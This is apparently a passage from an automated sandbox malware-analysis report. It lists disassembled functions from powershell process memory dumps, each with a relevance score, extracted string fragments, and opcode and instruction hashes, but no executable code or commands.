                                                                            • String ID: 4'^q$84l$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3594105772
                                                                            • Opcode ID: deab88b434432cdac5311074b9dc20b61c1e8e4be052f4ac6b532c7a3e6bde88
                                                                            • Instruction ID: 7f819ea62e54551d64c6688915d6c56b185672d1fc28a0bd21a5973468160fa5
                                                                            • Opcode Fuzzy Hash: deab88b434432cdac5311074b9dc20b61c1e8e4be052f4ac6b532c7a3e6bde88
                                                                            • Instruction Fuzzy Hash: 1351F130E00244DFEBB98F05C544BEA77B3AF45751F58A0AAE8068B299C735DC85CBA1
                                                                            Function 06DB9680 Relevance: 9.2, Strings: 7, Instructions: 474COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                            • API String ID: 0-1608119003
                                                                            • Opcode ID: 46880f3d42218e6aaff4edf120ba869ef0bc81f803777288417854425d30368c
                                                                            • Instruction ID: 3996b2924192e9c24b622658e7d8869660b35d50401e5db0267088484fbb335c
                                                                            • Opcode Fuzzy Hash: 46880f3d42218e6aaff4edf120ba869ef0bc81f803777288417854425d30368c
                                                                            • Instruction Fuzzy Hash: FBF13631F04294CFDB509F6884217AABBF2AFC6220F14946ADA56CF359DB32C845C7E1
                                                                            Function 06DB2A20 Relevance: 9.0, Strings: 7, Instructions: 277COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3199432138
                                                                            • Opcode ID: b5bd5f45e851e96cd4d0f448cb69a67b547ba9fc919806c185d12ae8e53fc291
                                                                            • Instruction ID: 6734277079f9fbf6cde17138d586b616123aafe77bffead5ebdc3ebbf2673040
                                                                            • Opcode Fuzzy Hash: b5bd5f45e851e96cd4d0f448cb69a67b547ba9fc919806c185d12ae8e53fc291
                                                                            • Instruction Fuzzy Hash: 6791F432F04205DFDB659F2998106FABBF2AFC5310F1484AAD446CB25ADF35CA85C7A1
                                                                            Function 06DBCAB0 Relevance: 8.9, Strings: 7, Instructions: 160COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$84l$d%dq$d%dq$d%dq$tP^q$$^q
                                                                            • API String ID: 0-2496723915
                                                                            • Opcode ID: 461c414efd261575c98b4b7bdcf4d878ccba7131df0289849f1a51b2bdd9b9ff
                                                                            • Instruction ID: e9dca3724debed134b3f1c61f3994381d570e78c1b91ec90c8ee8bd0b43f8f03
                                                                            • Opcode Fuzzy Hash: 461c414efd261575c98b4b7bdcf4d878ccba7131df0289849f1a51b2bdd9b9ff
                                                                            • Instruction Fuzzy Hash: 0451D134E20205DFDB648F14C544BEABBF2BF84750F1994AAE8469B399C731DC80CBA1
                                                                            Function 06DB0CD0 Relevance: 7.7, Strings: 6, Instructions: 209COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                            • API String ID: 0-2782953261
                                                                            • Opcode ID: 12f1eb974518cd4cc588347134854921a0c2bdec9971973c869da2f0a42675e1
                                                                            • Instruction ID: a3fa4641528c66e5375ce329cff6449e505fc0facd35b71b3e05ecf44b365c35
                                                                            • Opcode Fuzzy Hash: 12f1eb974518cd4cc588347134854921a0c2bdec9971973c869da2f0a42675e1
                                                                            • Instruction Fuzzy Hash: 0A514831B04344DFD7A49B699840B6BBBE69FC1720F14846AD50ACF399DE36D841C3A1
                                                                            Function 06DBDA14 Relevance: 7.7, Strings: 6, Instructions: 193COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$84l$tP^q$$^q$$^q$$^q
                                                                            • API String ID: 0-1270209019
                                                                            • Opcode ID: 4c7194f58712aead4ef80c4edf3b475884e34856a994ad6925b85944bf1e0c45
                                                                            • Instruction ID: dabf5fe888e94ca863a664cbed8341c59c6a98d7831cbf12c94ec092058256b1
                                                                            • Opcode Fuzzy Hash: 4c7194f58712aead4ef80c4edf3b475884e34856a994ad6925b85944bf1e0c45
                                                                            • Instruction Fuzzy Hash: 36619230A04309DFDBA88F14C544BFA77B3AF88311F14A46AE8425B29DCB75DD80CBA5
                                                                            Function 06DBDA28 Relevance: 7.7, Strings: 6, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$84l$tP^q$$^q$$^q$$^q
                                                                            • API String ID: 0-1270209019
                                                                            • Opcode ID: c0554cfe56a4e73b93b0f1137be4cef5a95de88b523ec8eae96f741f749f832c
                                                                            • Instruction ID: 9ce4befcf4018d15001b6f5ceb29509b8b82f32e1f5edcf485dfb6d17d8276bb
                                                                            • Opcode Fuzzy Hash: c0554cfe56a4e73b93b0f1137be4cef5a95de88b523ec8eae96f741f749f832c
                                                                            • Instruction Fuzzy Hash: D7619F30A00309DFDBA88F14C544BFA77B3AF88711F14A469E8425B29DCB71ED80CBA5
                                                                            Function 06DBCBF6 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$84l$d%dq$d%dq$d%dq$tP^q
                                                                            • API String ID: 0-3264296853
                                                                            • Opcode ID: 063c17c31730d941acc831d45c62891376e34a348d4de283d03b7b3e0b9905a1
                                                                            • Instruction ID: 0a5ea66889a64275b0a2a7829f3933c20a1c76a18a9d9e4e5d71d7b6b201a172
                                                                            • Opcode Fuzzy Hash: 063c17c31730d941acc831d45c62891376e34a348d4de283d03b7b3e0b9905a1
                                                                            • Instruction Fuzzy Hash: 4B31BF34B50214DFDB68DF54C580AAABBF2BB88710F259559E80AAF358CA31EC41CBD1
                                                                            Function 06DB3D08 Relevance: 6.5, Strings: 5, Instructions: 279COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tP^q$tP^q$$^q$$^q$$^q
                                                                            • API String ID: 0-578306960
                                                                            • Opcode ID: ef5cf30b460405e70947f1e607c4f2fab0a7d5822f5cca14c168ad0c52d02b51
                                                                            • Instruction ID: 9a55f54dab1228f6dff07cb3656e2a6bb43e9ae9653ed269c6fc5d120708179b
                                                                            • Opcode Fuzzy Hash: ef5cf30b460405e70947f1e607c4f2fab0a7d5822f5cca14c168ad0c52d02b51
                                                                            • Instruction Fuzzy Hash: C7916231F04345DFD7648B699804BAABBF2AFC5310F25C46BE54ACB289DA32CC41C7A1
                                                                            Function 06DB2E20 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3272787073
                                                                            • Opcode ID: 4c8a59a2df908dc5bff696f3ba1419455ddeb5ea2d54883cca85bead2095a564
                                                                            • Instruction ID: 6f9fa143c753ab3017bc96584df00cd25bb77460f074bf06f7a98a88f939ca6d
                                                                            • Opcode Fuzzy Hash: 4c8a59a2df908dc5bff696f3ba1419455ddeb5ea2d54883cca85bead2095a564
                                                                            • Instruction Fuzzy Hash: 6651E732E04345DFCB568F7A88005BABBF1AF86710B1984ABD856CF25ADB31CA45C761
                                                                            Function 06DBDDDC Relevance: 6.4, Strings: 5, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84l$XRcq$XRcq$tP^q$$^q
                                                                            • API String ID: 0-2994227698
                                                                            • Opcode ID: 9c4ea2315fcf89edfbdf8c95184850c78ed54a1472ff2a7934a23c69afa43141
                                                                            • Instruction ID: d1817c1e62c1e4f6ea22bc4305b35667bd756f853c51584643160adc70ae0590
                                                                            • Opcode Fuzzy Hash: 9c4ea2315fcf89edfbdf8c95184850c78ed54a1472ff2a7934a23c69afa43141
                                                                            • Instruction Fuzzy Hash: 34418E30E05204DFDBA48F55C144AEAFBF3AF88721F199199E8869B259C731DD81CBA1
                                                                            Function 06DBDDF0 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84l$XRcq$XRcq$tP^q$$^q
                                                                            • API String ID: 0-2994227698
                                                                            • Opcode ID: e324c1d73c991fa70e3caf2fecc885f59027ad6e559bb8fd31f42e6e7df5ef2d
                                                                            • Instruction ID: 9974254e986f2b51cc8b8bb320ddff15d7fab284ef172934680145c2c9dfa8a1
                                                                            • Opcode Fuzzy Hash: e324c1d73c991fa70e3caf2fecc885f59027ad6e559bb8fd31f42e6e7df5ef2d
                                                                            • Instruction Fuzzy Hash: DF416F30E04204DFDBA48F55C144AEAFBF3AF88711F19D099E8569B259C731ED81CB91
                                                                            Function 06DB83F8 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3997570045
                                                                            • Opcode ID: 1dfff094e23138ec6f9b777e4961eef89ff9b40eed6a1cc27b6cd329043010a6
                                                                            • Instruction ID: 1b8d1cad3c6499290256e5d140740f409c51c2b74cd25c372101954908c54191
                                                                            • Opcode Fuzzy Hash: 1dfff094e23138ec6f9b777e4961eef89ff9b40eed6a1cc27b6cd329043010a6
                                                                            • Instruction Fuzzy Hash: F431B130E00204DFEBA48F05C544BF5B7FAAB48720F18A16AE8575F299CB31D844DB96
                                                                            Function 06DB2508 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                            • API String ID: 0-2825857601
                                                                            • Opcode ID: c52c2822cb31e515ee48649183a3fa58719779234f2dfb157dae87256cc0f967
                                                                            • Instruction ID: d05e8aec0feae8a6cacb6363154815077c9779fdf00eb35a4a29583d9d8b75e6
                                                                            • Opcode Fuzzy Hash: c52c2822cb31e515ee48649183a3fa58719779234f2dfb157dae87256cc0f967
                                                                            • Instruction Fuzzy Hash: C721AE33E10205DFEBB98F09C564AF977F8AF40761F58606AE8468A15CCB35DB80CAD5
                                                                            Function 06DBC360 Relevance: 5.5, Strings: 4, Instructions: 472COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (o^q$(o^q$(o^q$(o^q
                                                                            • API String ID: 0-1978863864
                                                                            • Opcode ID: b99a7db54968e458a7de787993279c54bdef17a167032c73c709f026ec484ccb
                                                                            • Instruction ID: 9142297f6f19ef2c10cdb52d36c266ea5f2a4717738c481075d555ed441e59ab
                                                                            • Opcode Fuzzy Hash: b99a7db54968e458a7de787993279c54bdef17a167032c73c709f026ec484ccb
                                                                            • Instruction Fuzzy Hash: 76F14431F14305DFDB548F68D804BEABBE2BF85310F14946AE856CB2A9DB31D885C7A1
                                                                            Function 06DBA260 Relevance: 5.4, Strings: 4, Instructions: 390COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                            • API String ID: 0-1420252700
                                                                            • Opcode ID: c83cefc82d12a9487193b816519ef7dda3054a70a312f9c9e97248bd1a29e55e
                                                                            • Instruction ID: b3dc960a6cd06433fdceae520eedbfa5cbccc8bffdfcb92ba953de3a9ea98822
                                                                            • Opcode Fuzzy Hash: c83cefc82d12a9487193b816519ef7dda3054a70a312f9c9e97248bd1a29e55e
                                                                            • Instruction Fuzzy Hash: 72D15831B04314DFDB558B6C98057AABBE2EFC5310F18846AD84BCB359DE32C986C7A1
                                                                            Function 06DB57E0 Relevance: 5.3, Strings: 4, Instructions: 278COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84l$84l$tP^q$tP^q
                                                                            • API String ID: 0-968489892
                                                                            • Opcode ID: 78a4560efa54b56c992930027706dcc5cfe0ec4593825cbdd5ace410f3eb10df
                                                                            • Instruction ID: 1204956c8f4f87fad8bfc245f29451ee26008f169402e367db69aa36f79dc9c8
                                                                            • Opcode Fuzzy Hash: 78a4560efa54b56c992930027706dcc5cfe0ec4593825cbdd5ace410f3eb10df
                                                                            • Instruction Fuzzy Hash: 2B916930F00305DFCB589F69D890BAABBE6AF84710F24846AD846DF399DA31D844C7A1
                                                                            Function 06DB3078 Relevance: 5.1, Strings: 4, Instructions: 112COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84l$84l$tP^q$tP^q
                                                                            • API String ID: 0-968489892
                                                                            • Opcode ID: ef99e10c18e06908a5c2732bd76601880a17fbbf4ac7d48913ddb7d8d4ba3268
                                                                            • Instruction ID: 9ac54abe2784ffef37d61615a3f76208a97f540e5c49d77e1a0d7ded5f693524
                                                                            • Opcode Fuzzy Hash: ef99e10c18e06908a5c2732bd76601880a17fbbf4ac7d48913ddb7d8d4ba3268
                                                                            • Instruction Fuzzy Hash: 62416930E09384DFC7558F68C814A96BFF5AF46710F1E848ED4868F29ACA31DC05C7A2
                                                                            Function 06DB8688 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                            • API String ID: 0-2125118731
                                                                            • Opcode ID: 9570e405ba3f46efa84f57aaa36f5a6d70cd3234fbd695289ac3af71ad2172bb
                                                                            • Instruction ID: 3cd7fe8e5eed6114e51bc05ae6914cb8a5cdd27214ced72c9ca57aeed494d696
                                                                            • Opcode Fuzzy Hash: 9570e405ba3f46efa84f57aaa36f5a6d70cd3234fbd695289ac3af71ad2172bb
                                                                            • Instruction Fuzzy Hash: EF11E135F10309DFEBB48F558544AE6B7FCAB40658F24547EC80A8B209DB71C545EBE1
                                                                            Function 06DB1953 Relevance: 5.0, Strings: 4, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2997627949.0000000006DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6db0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$$^q$$^q
                                                                            • API String ID: 0-2049395529
                                                                            • Opcode ID: 8d04e2b2c1adc5329375df93a9d6f0b5247d9bd929e17bddd3f4678f04c8d184
                                                                            • Instruction ID: fd34249ade369350b2ea943da07a4fc2d1581122fdd3f8ea0e892b18fbee6e6d
                                                                            • Opcode Fuzzy Hash: 8d04e2b2c1adc5329375df93a9d6f0b5247d9bd929e17bddd3f4678f04c8d184
                                                                            • Instruction Fuzzy Hash: 3AF0E920F0115AD7CA7C163D1C346A799E79BC1A50724562ED0A79F38CCD25CD8643E6

                                                                            Executed Functions

                                                                            Function 04B5EFE8 Relevance: 1.5, Strings: 1, Instructions: 281COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \VHm
                                                                            • API String ID: 0-3272467948
                                                                            • Opcode ID: 476b1cd890308f415bdbf3b4287ed1eef82038fc86208de6aadce5f6bf09475b
                                                                            • Instruction ID: ee58e12d2275f9aabdd5f5d928c8409694d90c17eef0a22ff26d06863bf23ecb
                                                                            • Opcode Fuzzy Hash: 476b1cd890308f415bdbf3b4287ed1eef82038fc86208de6aadce5f6bf09475b
                                                                            • Instruction Fuzzy Hash: 6DB14F70E00209CFDF10DFA9D9857ADFBF2EF88314F188569E815A7264EB74A845CB81
                                                                            Function 04B5F8B8 Relevance: .3, Instructions: 266COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8215ae8e04a43ad63833828119fc322885c246c9d9d2695ac68707a3e9c44fda
                                                                            • Instruction ID: fd90fc62f9f94548c59778389326abf8727d36a7b54bac50d7489c3df1a3e92b
                                                                            • Opcode Fuzzy Hash: 8215ae8e04a43ad63833828119fc322885c246c9d9d2695ac68707a3e9c44fda
                                                                            • Instruction Fuzzy Hash: 1AB17F71E00209DFDB10CFA9D8917ADFBF2EF88314F148569D855E72A4EB74A846CB81
                                                                            Function 09282CB8 Relevance: 13.0, Strings: 10, Instructions: 521COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009982520.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_9280000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                            • API String ID: 0-1065491568
                                                                            • Opcode ID: 639ce805f256a1a6f31ccbeb7b3ed533ad38552b917fd63577256f89b455974d
                                                                            • Instruction ID: 5c22b8c3b044047c1982ab9e15ffaf9b519138ec7d047a54cdc4d77db7d70f65
                                                                            • Opcode Fuzzy Hash: 639ce805f256a1a6f31ccbeb7b3ed533ad38552b917fd63577256f89b455974d
                                                                            • Instruction Fuzzy Hash: 5E12F470B11205DFC714EF68C541A6BBBF2AF89750F1480AAE8159F3A5CB32DC45CBA1
                                                                            Function 04B5B4F0 Relevance: 10.5, Strings: 8, Instructions: 520COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8NHm$Hbq$h]Hm$h]Hm$h]Hm$$^q$$^q$IHm
                                                                            • API String ID: 0-2014077908
                                                                            • Opcode ID: 74d39d24e1a869dd6e288304c41297b509d32d75dc0af6e3935a693f584bc8ac
                                                                            • Instruction ID: 7ab148018160c945756925a621e89d40e247ee4b2d33559cf685b2350f458201
                                                                            • Opcode Fuzzy Hash: 74d39d24e1a869dd6e288304c41297b509d32d75dc0af6e3935a693f584bc8ac
                                                                            • Instruction Fuzzy Hash: 452250347042188FDB25DB24C854BAEBBB6AF89304F1484E9D90AAB365DF34ED45CF81
                                                                            Function 07822748 Relevance: 10.2, Strings: 8, Instructions: 226COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$$^q$$^q$$^q$$^q$$^q$$^q$A)i
                                                                            • API String ID: 0-769629893
                                                                            • Opcode ID: 106de6bcff156ceb7e217ee94ccafbd220fd9fe2826c34156514f143e6cc26e0
                                                                            • Instruction ID: 720f1bd6a0399380644c5bacc34cac0720568e113f76195766307b63f318f46a
                                                                            • Opcode Fuzzy Hash: 106de6bcff156ceb7e217ee94ccafbd220fd9fe2826c34156514f143e6cc26e0
                                                                            • Instruction Fuzzy Hash: DF712AB0B142199FCB149F78C800BAA7BA2BF94311F118466E805CF295CF35D9C6D7A1
                                                                            Function 07827CD0 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                            • API String ID: 0-2822668367
                                                                            • Opcode ID: 7ac78e9658a61688032ce7c7738026ffada115a30d4200ca8078d33e2c4b7f29
                                                                            • Instruction ID: d1477e698924ce49b997d0da1054c3353bd0049c859c587d2acf452f88578a9d
                                                                            • Opcode Fuzzy Hash: 7ac78e9658a61688032ce7c7738026ffada115a30d4200ca8078d33e2c4b7f29
                                                                            • Instruction Fuzzy Hash: ACD1C1B4A002199FCB08CF69C551B5EBBE2AF94304F10C429DA05AF395CF75DC878BA1
                                                                            Function 07826A3D Relevance: 7.8, Strings: 6, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                                            • API String ID: 0-2822668367
                                                                            • Opcode ID: f6b71ff4867c7816c1dc40731e17c50e966f3c3b39b38e93ca697c5cf133778b
                                                                            • Instruction ID: e9ddfba92417741a8d324d2d7afcba93b23b62cdc5eee22b9bf0c48ed3042ed6
                                                                            • Opcode Fuzzy Hash: f6b71ff4867c7816c1dc40731e17c50e966f3c3b39b38e93ca697c5cf133778b
                                                                            • Instruction Fuzzy Hash: 83D1B2B4B002189FDB14DF58CD51B5ABBB2BB94304F1080A9D909AF395CF72DD868FA1
                                                                            Function 09281B22 Relevance: 6.9, Strings: 5, Instructions: 657COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009982520.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_9280000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                                            • API String ID: 0-4202989938
                                                                            • Opcode ID: c921df29f9f918158f78199288eb98ffaf973274bfd18387e4aaaa53270249c0
                                                                            • Instruction ID: a67971bbd1db6748763486723a3cb25ae0c3b18c89925366e057551f64a90175
                                                                            • Opcode Fuzzy Hash: c921df29f9f918158f78199288eb98ffaf973274bfd18387e4aaaa53270249c0
                                                                            • Instruction Fuzzy Hash: 806270B4A40219DFDB24DB68CD54BAABBB2BB84304F1080E5D9096F395CB719DC6CF91
                                                                            Function 0782A538 Relevance: 5.5, Strings: 4, Instructions: 513COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                            • API String ID: 0-1420252700
                                                                            • Opcode ID: 52fff67625a42718a42b266c2c206b2f44fd390f0ff7da75eb78e95a13e282d4
                                                                            • Instruction ID: 59ae3d179e932aa0431767a56c40cb03cb9508720c85cf55aeabdac4e8ad47e4
                                                                            • Opcode Fuzzy Hash: 52fff67625a42718a42b266c2c206b2f44fd390f0ff7da75eb78e95a13e282d4
